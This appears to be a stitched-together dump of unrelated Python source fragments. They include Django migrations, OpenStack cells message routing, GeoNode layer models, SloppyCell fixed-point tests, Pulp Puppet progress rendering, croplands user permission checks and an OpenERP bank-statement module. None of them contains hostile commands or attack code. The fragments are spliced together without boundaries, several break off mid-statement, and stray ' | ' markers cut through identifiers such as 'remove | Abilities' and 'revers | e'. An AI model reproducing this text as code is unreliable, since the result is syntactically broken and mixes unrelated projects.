infoL={'Title': infoLabels['title'], 'Plot': infoLabels['plot'], 'Genre': infoLabels['genre']}
# play with bookmark
from resources.universal import playbackengine
player = playbackengine.PlayWithoutQueueSupport(resolved_url=stre |
import sys
def addAbilities(core, actor, player):
if actor.getLevel() >= 10:
actor.addAbility("sp_cloaked_recovery_0")
if actor.getLevel() >= 28:
actor.addAbility("sp_cloaked_recovery_1")
if actor.getLevel() >= 54:
actor.addAbility("sp_cloaked_recovery_2")
if actor.getLevel() >= 70:
actor.addAbility("sp_cloaked_recovery_3")
if actor.getLevel() >= 86:
actor.addAbility("sp_cloaked_recovery_4")
return
def remove | Abilities(core, actor, player):
actor.removeAbility("sp_cloaked_recovery_0")
actor.removeAbility("sp_cloaked_recovery_1")
actor.removeAbility("sp_cloaked_recovery_2")
actor.removeAbility("sp_cloaked_recovery_3")
actor.remove | Ability("sp_cloaked_recovery_4")
return
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-10-01 13:05
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('contenttypes', '0002_remove_content_type_name'),
('forum', '0004_activity_brick_name'),
]
operations = [
migrations.AddField(
m | odel_name='activity',
name='target_id',
field=models.PositiveSmallIntegerField(default=0, null=True),
),
migrations.A | ddField(
model_name='activity',
name='target_type',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='contenttypes.ContentType'),
),
]
|
or a specific
single cell.
'target_cell' can be a full cell name like 'api!child-cell' or it can
be an instance of the CellState class if the target is a neighbor cell.
"""
message_type = 'targeted'
def __init__(self, msg_runner, ctxt, method_name, method_kwargs,
direction, target_cell, **kwargs):
super(_TargetedMessage, self).__init__(msg_runner, ctxt,
method_name, method_kwargs, direction, **kwargs)
if isinstance(target_cell, cells_state.CellState):
# Neighbor cell or ourselves. Convert it to a 'full path'.
if target_cell.is_me:
target_cell = self.our_path_part
else:
target_cell = '%s%s%s' % (self.our_path_part,
_PATH_CELL_SEP,
target_cell.name)
self.target_cell = target_cell
self.base_attrs_to_json.append('target_cell')
def _get_next_hop(self):
"""Return the cell name for the next hop. If the next hop is
the current cell, return None.
"""
if self.target_cell == self.routing_path:
return self.state_manager.my_cell_state
target_cell = self.target_cell
routing_path = self.routing_path
current_hops = routing_path.count(_PATH_CELL_SEP)
next_hop_num = current_hops + 1
dest_hops = target_cell.count(_PATH_CELL_SEP)
if dest_hops < current_hops:
reason_args = {'target_cell': target_cell,
'routing_path': routing_path}
reason = _("destination is %(target_cell)s but routing_path "
"is %(routing_path)s") % reason_args
raise exception.CellRoutingInconsistency(reason=reason)
dest_name_parts = target_cell.split(_PATH_CELL_SEP)
if (_PATH_CELL_SEP.join(dest_name_parts[:next_hop_num]) !=
routing_path):
reason_args = {'target_cell': target | _cell,
'routing_path': routing_path}
reason = _("destination is %(target_cell)s but routing_path "
"is %(routing_path)s") % | reason_args
raise exception.CellRoutingInconsistency(reason=reason)
next_hop_name = dest_name_parts[next_hop_num]
if self.direction == 'up':
next_hop = self.state_manager.get_parent_cell(next_hop_name)
else:
next_hop = self.state_manager.get_child_cell(next_hop_name)
if not next_hop:
cell_type = 'parent' if self.direction == 'up' else 'child'
reason_args = {'cell_type': cell_type,
'target_cell': target_cell}
reason = _("Unknown %(cell_type)s when routing to "
"%(target_cell)s") % reason_args
raise exception.CellRoutingInconsistency(reason=reason)
return next_hop
def process(self):
"""Process a targeted message. This is called for all cells
that touch this message. If the local cell is the one that
created this message, we reply directly with a Response instance.
If the local cell is not the target, an eventlet queue is created
and we wait for the response to show up via another thread
receiving the Response back.
Responses to targeted messages are routed directly back to the
source. No eventlet queues are created in intermediate hops.
All exceptions for processing the message across the whole
routing path are caught and encoded within the Response and
returned to the caller.
"""
try:
next_hop = self._get_next_hop()
except Exception as exc:
exc_info = sys.exc_info()
LOG.exception(_("Error locating next hop for message: %(exc)s"),
{'exc': exc})
return self._send_response_from_exception(exc_info)
if next_hop.is_me:
# Final destination.
response = self._process_locally()
return self._send_response(response)
# Need to forward via neighbor cell.
if self.need_response and self.source_is_us():
# A response is needed and the source of the message is
# this cell. Create the eventlet queue.
self._setup_response_queue()
wait_for_response = True
else:
wait_for_response = False
try:
# This is inside the try block, so we can encode the
# exception and return it to the caller.
if self.hop_count >= self.max_hop_count:
raise exception.CellMaxHopCountReached(
hop_count=self.hop_count)
next_hop.send_message(self)
except Exception as exc:
exc_info = sys.exc_info()
err_str = _("Failed to send message to cell: %(next_hop)s: "
"%(exc)s")
LOG.exception(err_str, {'exc': exc, 'next_hop': next_hop})
self._cleanup_response_queue()
return self._send_response_from_exception(exc_info)
if wait_for_response:
# Targeted messages only have 1 response.
remote_response = self._wait_for_json_responses()[0]
return Response.from_json(remote_response)
class _BroadcastMessage(_BaseMessage):
"""A broadcast message. This means to call a method in every single
cell going in a certain direction.
"""
message_type = 'broadcast'
def __init__(self, msg_runner, ctxt, method_name, method_kwargs,
direction, run_locally=True, **kwargs):
super(_BroadcastMessage, self).__init__(msg_runner, ctxt,
method_name, method_kwargs, direction, **kwargs)
# The local cell creating this message has the option
# to be able to process the message locally or not.
self.run_locally = run_locally
self.is_broadcast = True
def _get_next_hops(self):
"""Set the next hops and return the number of hops. The next
hops may include ourself.
"""
if self.hop_count >= self.max_hop_count:
return []
if self.direction == 'down':
return self.state_manager.get_child_cells()
else:
return self.state_manager.get_parent_cells()
def _send_to_cells(self, target_cells):
"""Send a message to multiple cells."""
for cell in target_cells:
cell.send_message(self)
def _send_json_responses(self, json_responses):
"""Responses to broadcast messages always need to go to the
neighbor cell from which we received this message. That
cell aggregates the responses and makes sure to forward them
to the correct source.
"""
return super(_BroadcastMessage, self)._send_json_responses(
json_responses, neighbor_only=True, fanout=True)
def process(self):
"""Process a broadcast message. This is called for all cells
that touch this message.
The message is sent to all cells in the certain direction and
the creator of this message has the option of whether or not
to process it locally as well.
If responses from all cells are required, each hop creates an
eventlet queue and waits for responses from its immediate
neighbor cells. All responses are then aggregated into a
single list and are returned to the neighbor cell until the
source is reached.
When the source is reached, a list of Response instances are
returned to the caller.
All exceptions for processing the message across the whole
routing path are caught and encoded within the Response and
returned to the caller. It is possible to get a mix of
successful responses and failure responses. The caller is
responsible for dealing with this.
"""
try:
next_hops = self._get_next_hops()
except Exception as exc:
exc_info = sys.exc_info()
LOG.ex |
from pyelt.datalayers.database import Column, Columns
from pyelt.datalayers.dv import Sat, DvEntity, Link, Hub, HybridSat, LinkReference
class Role:
pass
class Act:
pass
class Participation:
pass
class Zorgverlener(DvEntity, Role):
class Default(Sat):
zorgverlenernummer = Columns.TextColumn()
aanvangsdatum = Columns.DateColumn()
einddatum = Columns.DateColumn()
class Personalia(Sat):
achternaam = Columns.TextColumn()
tussenvoegsels = Columns.TextColumn()
voorletters = Columns.TextColumn()
| voornaam = Columns.TextColumn()
bijnaam = Columns.TextColumn()
# wordt niet gebruikt in dwh2.0; hier gebruikt voor testen uitgevoerd in test03r_domain.py
class ContactGegevens(HybridSat):
class Types(HybridSat.Types):
telefoon = 'telefoon'
mobiel = 'mobiel'
mobiel2 = 'mobiel2'
telnummer = Columns.TextColumn()
datum = Co | lumns.DateColumn()
landcode = Columns.TextColumn()
default = Default()
personalia = Personalia()
contactgegevens = ContactGegevens()
class Adres(DvEntity, Role):
class Default(Sat):
postcode = Columns.TextColumn()
huisnummer = Columns.IntColumn()
huisnummer_toevoeging = Columns.TextColumn()
straat = Columns.TextColumn()
plaats = Columns.TextColumn()
land = Columns.TextColumn()
default = Default()
class Zorginstelling(DvEntity, Role):
class Default(Sat):
zorginstellings_naam = Columns.TextColumn()
zorginstellings_nummer = Columns.TextColumn()
default = Default()
#Dit is een link:
class Zorgverlener_Zorginstelling_Link(Link, Participation):
zorgverlener = LinkReference(Zorgverlener)
zorginstelling = LinkReference(Zorginstelling)
# Dit is een HybridLink:
class Zorgverlener_Adres_Link(Link):
class Types:
post = 'post'
bezoek = 'bezoek'
woon = 'woon'
zorgverlener = LinkReference(Zorgverlener)
adres = LinkReference(Adres)
class Zorginstelling_Adres_Link(Link):
zorginstelling = LinkReference(Zorginstelling)
adres = LinkReference(Adres)
|
s.get()
def get_absolute_url(self):
return reverse('layer_detail', args=(self.service_typename,))
def attribute_config(self):
# Get custom attribute sort order and labels if any
cfg = {}
visible_attributes = self.attribute_set.visible()
if (visible_attributes.count() > 0):
cfg["getFeatureInfo"] = {
"fields": [l.attribute for l in visible_attributes],
"propertyNames": dict([(l.attribute, l.attribute_label) for l in visible_attributes])
}
return cfg
def __str__(self):
if self.typename is not None:
return "%s Layer" % self.service_typename.encode('utf-8')
elif self.name is not None:
return "%s Layer" % self.name
else:
return "Unamed Layer"
class Meta:
# custom permissions,
# change and delete are standard in django
permissions = (
('view_layer','Can view'),
('change_layer_permissions',"Can change permissions"),
('edit_layer_style','can edit style'),
('edit_layer_metadata','can edit metadata'),
('edit_layer_data','can edit data'),
('download_layer','can download'),
('download_layer_metadata','can download metadata'))
# Permission Level Constants
# LEVEL_NONE inherited
LEVEL_READ = 'layer_readonly'
LEVEL_WRITE = 'layer_readwrite'
LEVEL_ADMIN = 'layer_admin'
def maps(self):
from geonode.maps.models import MapLayer
return MapLayer.objects.filter(name=self.typename)
@property
def class_name(self):
return self.__class__.__name__
class Layer_Styles(models.Model):
layer = models.ForeignKey(Layer)
style = models.ForeignKey(Style)
class UploadSession(models.Model):
"""Helper class to keep track of uploads.
"""
date = models.DateTimeField(auto_now=True)
user = models.ForeignKey(settings.AUTH_USER_MODEL)
processed = models.BooleanField(default=False)
error = models.TextField(blank=True, null=True)
traceback = models.TextField(blank=True, null=True)
def successful(self):
return self.processed and self.errors is None
class LayerFile(models.Model):
"""Helper class to store original files.
"""
upload_session = models.ForeignKey(UploadSession)
name = models.CharField(max_length=255)
base = models.BooleanField(default=False)
file = models.FileField(upload_to='layers', max_length=255)
class AttributeManager(models.Manager):
"""Helper class to access filtered attributes
"""
def visible(self):
return self.get_query_set().filter(
visible=True).order_by('display_order')
class Attribute(mo | dels.Model):
"""
Auxiliary model for storing layer attributes.
This helps reduce the need for runtime lookups
to other servers, and lets users customize attribute titles,
sort order, and visibility.
"""
layer = models.ForeignKey(
Layer,
blank=False,
null=False,
unique=False,
related_name='attribute_set')
attribute = models.CharField(
| _('attribute name'),
help_text=_('name of attribute as stored in shapefile/spatial database'),
max_length=255,
blank=False,
null=True,
unique=False)
description = models.CharField(
_('attribute description'),
help_text=_('description of attribute to be used in metadata'),
max_length=255,
blank=True,
null=True)
attribute_label = models.CharField(
_('attribute label'),
help_text=_('title of attribute as displayed in GeoNode'),
max_length=255,
blank=False,
null=True,
unique=False)
attribute_type = models.CharField(
_('attribute type'),
help_text=_('the data type of the attribute (integer, string, geometry, etc)'),
max_length=50,
blank=False,
null=False,
default='xsd:string',
unique=False)
visible = models.BooleanField(
_('visible?'),
help_text=_('specifies if the attribute should be displayed in identify results'),
default=True)
display_order = models.IntegerField(
_('display order'),
help_text=_('specifies the order in which attribute should be displayed in identify results'),
default=1)
# statistical derivations
count = models.IntegerField(
_('count'),
help_text=_('count value for this field'),
default=1)
min = models.CharField(
_('min'),
help_text=_('minimum value for this field'),
max_length=255,
blank=False,
null=True,
unique=False,
default='NA')
max = models.CharField(
_('max'),
help_text=_('maximum value for this field'),
max_length=255,
blank=False,
null=True,
unique=False,
default='NA')
average = models.CharField(
_('average'),
help_text=_('average value for this field'),
max_length=255,
blank=False,
null=True,
unique=False,
default='NA')
median = models.CharField(
_('median'),
help_text=_('median value for this field'),
max_length=255,
blank=False,
null=True,
unique=False,
default='NA')
stddev = models.CharField(
_('standard deviation'),
help_text=_('standard deviation for this field'),
max_length=255,
blank=False,
null=True,
unique=False,
default='NA')
sum = models.CharField(
_('sum'),
help_text=_('sum value for this field'),
max_length=255,
blank=False,
null=True,
unique=False,
default='NA')
unique_values = models.TextField(
_('unique values for this field'),
null=True,
blank=True,
default='NA')
last_stats_updated = models.DateTimeField(
_('last modified'),
default=datetime.now,
help_text=_('date when attribute statistics were last updated')) # passing the method itself, not
objects = AttributeManager()
def __str__(self):
return "%s" % self.attribute_label.encode(
"utf-8") if self.attribute_label else self.attribute.encode("utf-8")
def unique_values_as_list(self):
return self.unique_values.split(',')
def pre_save_layer(instance, sender, **kwargs):
if kwargs.get('raw', False):
instance.owner = instance.resourcebase_ptr.owner
instance.uuid = instance.resourcebase_ptr.uuid
instance.bbox_x0 = instance.resourcebase_ptr.bbox_x0
instance.bbox_x1 = instance.resourcebase_ptr.bbox_x1
instance.bbox_y0 = instance.resourcebase_ptr.bbox_y0
instance.bbox_y1 = instance.resourcebase_ptr.bbox_y1
if instance.abstract == '' or instance.abstract is None:
instance.abstract = 'No abstract provided'
if instance.title == '' or instance.title is None:
instance.title = instance.name
# Set a default user for accountstream to work correctly.
if instance.owner is None:
instance.owner = get_valid_user()
if instance.uuid == '':
instance.uuid = str(uuid.uuid1())
if instance.typename is None:
# Set a sensible default for the typename
instance.typename = 'geonode:%s' % instance.name
base_file = instance.get_base_file()
if base_file is not None:
extension = '.%s' % base_file.name
if extension in vec_exts:
instance.storeType = 'dataStore'
elif extension in cov_exts:
instance.storeType = 'coverageStore'
# Set sane defaults for None in bbox fields.
if instance.bbox_x0 is None:
instance.bbox_x0 = -180
if instance.bbox_x1 is None:
instance.bbox_x1 = 180
if instance.bbox_y0 is None:
instance.bbox_y0 = -90
if instance.bbox_y1 is None:
instance.bbox_y1 = 90
bbox = [
instance.bbox_x0,
instance.bbox_x1,
instance.b |
import unittest
import scipy
from SloppyCell.ReactionNetworks import *
lorenz = Network('lorenz')
lorenz.add_compartment('basic')
lorenz.add_species('x', 'basic', 0.5)
lorenz.add_species('y', 'basic', 0.5)
lorenz.add_species('z', 'basic', 0.5)
lorenz.add_parameter('sigma', 1.0)
lorenz.add_parameter('r', 2.0)
lorenz.add_parameter('b', 2.0)
lorenz.add_rate_rule('x', 'sigma*(y-x)')
lorenz.add_rate_rule('y', 'r*x - y - x*z')
lorenz.add_rate_rule('z', 'x*y - b*z')
class test_fixedpoints(unittest.TestCase):
def test_basic(self):
""" Test basic fixed-point finding """
net = lorenz.copy('test')
fp = Dynamics.dyn_var_fixed_point(net, dv0=[1,1,1], with_logs=False)
# This should find the fixed-point [sqrt(2), sqrt(2), 1]
self.assertAlmostEqual(fp[0], scipy.sqrt(2), 6, 'Failed on basic 1,0.')
self.assertAlmostEqual(fp[1], scipy.sqrt(2), 6, 'Failed on basic 1,1.')
self.assertAlmostEqual(fp[2], 1, 6, 'Failed on basic 1,2.')
fp = Dynamics.dyn_var_fixed_point(net, dv0=[-0.1,-0.1,-0.1],
with_logs=False)
# This should find the fixed-point [0, 0, 0]
self.assertAlmostEqual(fp[0], 0, 6, 'Failed on basic 2,0.')
self.assertAlmostEqual(fp[1], 0, 6, 'Failed on basic 2,1.')
self.assertAlmostEqual(fp[2], 0, 6, 'Failed on basic 2,2.')
| def test_withlogs(self):
""" Test fixed-point finding with lo | gs """
net = lorenz.copy('test')
fp = Dynamics.dyn_var_fixed_point(net, dv0=[1,1,1], with_logs=True)
# This should find the fixed-point [sqrt(2), sqrt(2), 1]
self.assertAlmostEqual(fp[0], scipy.sqrt(2), 6, 'Failed on logs 1,0.')
self.assertAlmostEqual(fp[1], scipy.sqrt(2), 6, 'Failed on logs 1,1.')
self.assertAlmostEqual(fp[2], 1, 6, 'Failed on logs 1,2.')
fp = Dynamics.dyn_var_fixed_point(net, dv0=[0.1,0.1,0.1],
with_logs=True)
# This should find the fixed-point [0, 0, 0]
self.assertAlmostEqual(fp[0], 0, 6, 'Failed on logs 2,0.')
self.assertAlmostEqual(fp[1], 0, 6, 'Failed on logs 2,1.')
self.assertAlmostEqual(fp[2], 0, 6, 'Failed on logs 2,2.')
def test_stability(self):
net = lorenz.copy('test')
# The sqrt(b*(r-1)), sqrt(b*(r-1)), r-1 fixed point is stable for r < rH
# Strogatz, Nonlinear Dynamics and Chaos (p. 316)
fp, stable = Dynamics.dyn_var_fixed_point(net, dv0=[1,1,1],
stability=True)
self.assertEqual(stable, -1, 'Failed to classify stable fixed point')
# (0,0,0) is a saddle here
fp, stable = Dynamics.dyn_var_fixed_point(net, dv0=[0.01,0.01,0.01],
stability=True)
self.assertEqual(stable, 0, 'Failed to classify saddle')
# (0,0,0) is a stable node here
net.set_var_ic('r', 0.5)
fp, stable = Dynamics.dyn_var_fixed_point(net, dv0=[0.1,0.1,0.1],
stability=True)
self.assertEqual(stable, -1, 'Failed to classify stable fixed point')
# Now make the far fixed point a saddle...
net.set_var_ic('sigma', 6.0)
net.set_var_ic('r', 25)
fp, stable = Dynamics.dyn_var_fixed_point(net, dv0=[10,10,10],
stability=True)
self.assertEqual(stable, 0, 'Failed to classify saddle')
suite = unittest.makeSuite(test_fixedpoints)
if __name__ == '__main__':
unittest.main()
|
#this model represents a request in our system
from google.appengine.ext import ndb
from datetime import datetime
from datetime import timedelta
class Request(ndb.Model):
city = ndb.StringProperty()
phone = ndb.StringProperty()
date = ndb.DateTimeProperty()
description = nd | b.StringProperty()
isCarNeeded = ndb.BooleanProperty()
@classmethod
def add(self,cit,phoneNum,desc,carNeeded):
req = Request()
req.city = cit
req.phone = phoneNum
req.descripti | on = desc
req.isCarNeeded = carNeeded
req.date = datetime.utcnow()
#converting UTC to GMT+2[Israel timezone]
#utc = datetime.utcnow()
#UTC_OFFSET = 3
#req.date = utc# - timedelta(hours=UTC_OFFSET) #(UTC+3 = GMT+2)
req.put() |
from pulp_puppet.common import constants
from pulp_puppet.common.publish_progress import PublishProgressReport
from pulp_puppet.common.sync_progress import SyncProgressReport
class PuppetStatusRenderer(StatusRenderer):
def __init__(self, context):
super(PuppetStatusRenderer, self).__init__(context)
# Sync Steps
self.sync_metadata_last_state = constants.STATE_NOT_STARTED
self.sync_modules_last_state = constants.STATE_NOT_STARTED
# Publish Steps
self.publish_modules_last_state = constants.STATE_NOT_STARTED
self.publish_metadata_last_state = constants.STATE_NOT_STARTED
self.publish_http_last_state = constants.STATE_NOT_STARTED
self.publish_https_last_state = constants.STATE_NOT_STARTED
# UI Widgets
self.sync_metadata_bar = self.prompt.create_progress_bar()
self.sync_modules_bar = self.prompt.create_progress_bar()
self.publish_modules_bar = self.prompt.create_progress_bar()
self.publish_metadata_spinner = self.prompt.create_spinner()
def display_report(self, progress_report):
# Sync Steps
if constants.IMPORTER_ID in progress_report:
sync_report = SyncProgressReport.from_progress_dict(progress_report[constants.IMPORTER_ID])
self._display_sync_metadata_step(sync_report)
self._display_sync_modules_step(sync_report)
# Publish Steps
if constants.DISTRIBUTOR_ID in progress_report:
publish_report = PublishProgressReport.from_progress_dict(progress_report[constants.DISTRIBUTOR_ID])
self._display_publish_modules_step(publish_report)
self._display_publish_metadata_step(publish_report)
self._display_publish_http_https_step(publish_report)
def _display_sync_metadata_step(self, sync_report):
# Do nothing if it hasn't started yet or has already finished
if sync_report.metadata_state == constants.STATE_NOT_STARTED or \
self.sync_metadata_last_state in constants.COMPLETE_STATES:
return
# Only render this on the first non-not-started state
if self.sync_metadata_last_state == constants.STATE_NOT_STARTED:
self.prompt.write(_('Downloading metadata...'), tag='download-metadata')
# Same behavior for running or success
if sync_report.metadata_state in (constants.STATE_RUNNING, constants.STATE_SUCCESS):
items_done = sync_report.metadata_query_finished_count
items_total = sync_report.metadata_query_total_count
item_type = _('Metadata Query')
self._render_itemized_in_progress_state(items_done, items_total,
item_type, self.sync_metadata_bar, sync_report.metadata_state)
# The onl | y state left to handle is if it failed
else:
self.prompt.render_failure_message(_('... failed'))
self.prompt.render_spacer()
self._render_error(sync_report.metadata_error_message,
sync_report.metadata_exception,
sync_report.metadata_tracebac | k)
# Before finishing update the state
self.sync_metadata_last_state = sync_report.metadata_state
def _display_sync_modules_step(self, sync_report):
# Do nothing if it hasn't started yet or has already finished
if sync_report.modules_state == constants.STATE_NOT_STARTED or \
self.sync_modules_last_state in constants.COMPLETE_STATES:
return
# Only render this on the first non-not-started state
if self.sync_modules_last_state == constants.STATE_NOT_STARTED:
self.prompt.write(_('Downloading new modules...'), tag='downloading')
# Same behavior for running or success
if sync_report.modules_state in (constants.STATE_RUNNING, constants.STATE_SUCCESS):
items_done = sync_report.modules_finished_count + sync_report.modules_error_count
items_total = sync_report.modules_total_count
item_type = _('Module')
self._render_itemized_in_progress_state(items_done, items_total, item_type,
self.sync_modules_bar, sync_report.modules_state)
# The only state left to handle is if it failed
else:
self.prompt.render_failure_message(_('... failed'))
self.prompt.render_spacer()
self._render_error(sync_report.modules_error_message,
sync_report.modules_exception,
sync_report.modules_traceback)
# Regardless of success or failure, display any individual module errors
# if the new state is complete
if sync_report.modules_state in constants.COMPLETE_STATES:
self._render_module_errors(sync_report.modules_individual_errors)
# Before finishing update the state
self.sync_modules_last_state = sync_report.modules_state
def _display_publish_modules_step(self, publish_report):
# Do nothing if it hasn't started yet or has already finished
if publish_report.modules_state == constants.STATE_NOT_STARTED or \
self.publish_modules_last_state in constants.COMPLETE_STATES:
return
# Only render this on the first non-not-started state
if self.publish_modules_last_state == constants.STATE_NOT_STARTED:
self.prompt.write(_('Publishing modules...'), tag='publishing')
# Same behavior for running or success
if publish_report.modules_state in (constants.STATE_RUNNING, constants.STATE_SUCCESS):
items_done = publish_report.modules_finished_count + publish_report.modules_error_count
items_total = publish_report.modules_total_count
item_type = _('Module')
self._render_itemized_in_progress_state(items_done, items_total, item_type,
self.publish_modules_bar, publish_report.modules_state)
# The only state left to handle is if it failed
else:
self.prompt.render_failure_message(_('... failed'))
self.prompt.render_spacer()
self._render_error(publish_report.modules_error_message,
publish_report.modules_exception,
publish_report.modules_traceback)
# Regardless of success or failure, display any individual module errors
# if the new state is complete
if publish_report.modules_state in constants.COMPLETE_STATES:
self._render_module_errors(publish_report.modules_individual_errors)
# Before finishing update the state
self.publish_modules_last_state = publish_report.modules_state
def _display_publish_metadata_step(self, publish_report):
# Do nothing if it hasn't started yet or has already finished
if publish_report.metadata_state == constants.STATE_NOT_STARTED or \
self.publish_metadata_last_state in constants.COMPLETE_STATES:
return
# Only render this on the first non-not-started state
if self.publish_metadata_last_state == constants.STATE_NOT_STARTED:
self.prompt.write(_('Generating repository metadata...'), tag='generating')
if publish_report.metadata_state == constants.STATE_RUNNING:
self.publish_metadata_spinner.next()
elif publish_report.metadata_state == constants.STATE_SUCCESS:
self.publish_metadata_spinner.next(finished=True)
self.prompt.write(_('... completed'), tag='completed')
self.prompt.render_spacer()
elif publish_report.metadata_state == constants.STATE_FAILED:
self.publish_metadata_spinner.next(finished=True)
self.prompt.render_failure_message(_('... failed'))
self.prompt.render_spacer()
self._render_error(publish_report.modules_error_message,
publish_report.modules_exception,
publish_report.modules_traceback)
self.publish_metadata_last_state = publish_report.metadata_state
d |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.9 on 2016-08-04 12:17
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class | Migration(migrations.Migration):
dependencies = [
('communities', '0013_auto_20160801_1241'),
]
operations = [
migr | ations.AlterField(
model_name='groupuser',
name='group',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='group_users', to='communities.CommunityGroup', verbose_name='Group'),
),
]
|
from croplands_api import api
from croplands_api.models import User
from croplands_api.views.api.processors import api_roles, remove_relations
from croplands_api.exceptions imp | ort Unauthorized
from croplands_api.auth import is_anonymou | s, current_user, verify_role
def can_edit_the_user(data=None, **kwargs):
"""
Determines if the current user can modify the specified user account.
:param data:
:param kwargs:
:return: None
"""
if is_anonymous():
raise Unauthorized()
if hasattr(current_user, 'id') and current_user.id == int(kwargs['instance_id']):
return
if verify_role('admin'):
return
raise Unauthorized()
def check_for_me(data=None, **kwargs):
"""
:param data:
:param kwargs:
:return: None
"""
if is_anonymous():
raise Unauthorized(description="Must send token.")
if kwargs['instance_id'] == 'me':
kwargs['instance_id'] = current_user.id
def ignore_read_only_fields(data=None, **kwargs):
"""
Removes the read only field from the data. Alternative could be to raise a 409 conflict.
:param data: json
:param kwargs:
:return: None
"""
read_only = ['password', 'attempts', 'email_verification_token', 'score', 'id', 'status']
for field in read_only:
if field in data:
del data[field]
# abort(409)
def create(app):
api.create_api(User,
app=app,
collection_name='users',
methods=['GET', 'PATCH'],
results_per_page=50,
preprocessors={
'GET_SINGLE': [check_for_me],
'PATCH_SINGLE': [can_edit_the_user, remove_relations,
ignore_read_only_fields],
'PATCH_MANY': [api_roles('admin'), remove_relations,
ignore_read_only_fields],
'DELETE': [api_roles('admin'), ]
},
postprocessors={
},
exclude_columns=['email', 'password', 'attempts',
'email_verification_token', 'status']
)
|
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
#
# Copyright (c) 2011 Noviat nv/sa (www.noviat.be). All rights reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import fields, osv
import openerp.addons.decimal_precision as dp
from openerp.tools.translate import _
from openerp.exceptions import UserError
class account_bank_statement(osv.osv):
_inherit = 'account.bank.statement'
def write(self, cr, uid, ids, vals, context=None):
if context is None:
context = {}
# bypass obsolete statement line resequencing
if vals.get('line_ids', False) or context.get('ebanking_import', False):
res = super(osv.osv, self).write(cr, uid, ids, vals, context=context)
else:
res = super(account_bank_statement, self).write(cr, uid, ids, vals, context=context)
return res
def button_confirm_bank(self, cr, uid, ids, context=None):
bank_statement_line_obj = self.pool.get('account.bank.statement.line')
super(account_bank_statement, self).button_confirm_bank(cr, uid, ids, context=context)
for st in self.browse(cr, uid, ids, context=context):
if st.line_ids:
line_ids = [l.id for l in st.line_ids]
cr.execute("UPDATE account_bank_statement_line \
SET state='confirm' WHERE id in %s ",
(tuple(line_ids),))
bank_statement_line_obj.invalidate_cache(cr, uid, ['state'], line_ids, context=context)
return True
def button_cancel(self, cr, uid, ids, context=None):
bank_statement_line_obj = self.pool.get('account.bank.statement.line')
super(account_bank_statement, self).button_cancel(cr, uid, ids, context=context)
for st in self.browse(cr, uid, ids, context=context):
if st.line_ids:
line_ids = [l.id for l in st.line_ids]
cr.execute("UPDATE account_bank_statement_line \
SET state='draft' WHERE id in %s ",
(tuple(line_ids),))
bank_statement_line_obj.invalidate_cache(cr, uid, ['state'], line_ids, context=context)
return True
class account_bank_statement_line_global(osv.osv):
_name = 'account.bank.statement.line.global'
_description = 'Batch Payment Info'
_columns = {
'name': fields.char('OBI', required=True, help="Originator to Beneficiary Information"),
'code': fields.char('Code', size=64, required=True),
'parent_id': fields.many2one('account.bank.statement.line.global', 'Parent Code', ondelete='cascade'),
'child_ids': fields.one2many('account.bank.statement.line.global', 'parent_id', 'Child Codes', copy=True),
'type': fields.selection([
('iso20022', 'ISO 20022'),
('coda', 'CODA'),
('manual', 'Manual'),
], 'Type', required=True),
'amount': fields.float('Amount', digits_compute=dp.get_precision('Account')),
'bank_statement_line_ids': fields.one2many('account.bank.statement.line', 'globalisation_id', 'Bank Statement Lines'),
}
_rec_name = 'code'
_defaults = {
'code': lambda s,c,u,ctx={}: s.pool.get('ir.sequence').next_by_code(c, u, 'account.bank.statement.line.global'),
'name': '/',
}
_sql_constraints = [
('code_uniq', 'unique (code)', 'The code must be unique !'),
]
def name_search(self, cr, user, name, args=None, operator='ilike', context=None, limit=100):
if not args:
args = []
ids = []
if name:
ids = self.search(cr, user, [('code', 'ilike', name)] + args, limit=limit)
if not ids:
ids = self.search(cr, user, [('name', operator, name)] + args, limit=limit)
if not ids and len(name.split()) >= 2:
#Separating code and name for searching
operand1, operand2 = name.split(' ', 1) #name can contain spaces
ids = self.search(cr, user, [('code', 'like', operand1), ('name', operator, operand2)] + args, limit=limit)
else:
ids = self.search(cr, user, | args, context=context, limit=limit)
return self.name_get(cr, user, ids, context=context)
class account_bank_statement_line(osv.osv):
_inherit = 'account.bank.statement.l | ine'
_columns = {
'val_date': fields.date('Value Date', states={'confirm': [('readonly', True)]}),
'globalisation_id': fields.many2one('account.bank.statement.line.global', 'Globalisation ID',
states={'confirm': [('readonly', True)]},
help="Code to identify transactions belonging to the same globalisation level within a batch payment"),
'globalisation_amount': fields.related('globalisation_id', 'amount', type='float',
relation='account.bank.statement.line.global', string='Glob. Amount', readonly=True),
'state': fields.selection([('draft', 'Draft'), ('confirm', 'Confirmed')],
'Status', required=True, readonly=True, copy=False),
'counterparty_name': fields.char('Counterparty Name', size=35),
'counterparty_bic': fields.char('Counterparty BIC', size=11),
'counterparty_number': fields.char('Counterparty Number', size=34),
'counterparty_currency': fields.char('Counterparty Currency', size=3),
}
_defaults = {
'state': 'draft',
}
def unlink(self, cr, uid, ids, context=None):
if context is None:
context = {}
if context.get('block_statement_line_delete', False):
raise UserError(_('Delete operation not allowed. Please go to the associated bank statement in order to delete and/or modify bank statement line.'))
return super(account_bank_statement_line, self).unlink(cr, uid, ids, context=context)
|
DEBUG = True
SQLALC | HEMY_DATABASE_URI = 'sqlite:////tmp/ | test.db' |
from django.template import Library, Node, Variable, VariableDoesNotExist
from django.core.urlresolvers import revers | e
from job_board.views import job_list_by_tag
register = Library()
def do_populate_tags(parser,token):
"""
render a list of tags, with it's link.
the token is tag.
Arguments:
- `parser`:
- `token`:
"""
bits = token.split_contents()
print bits
return PopulateTagsNode( | bits[1])
class PopulateTagsNode(Node):
def __init__(self,tag):
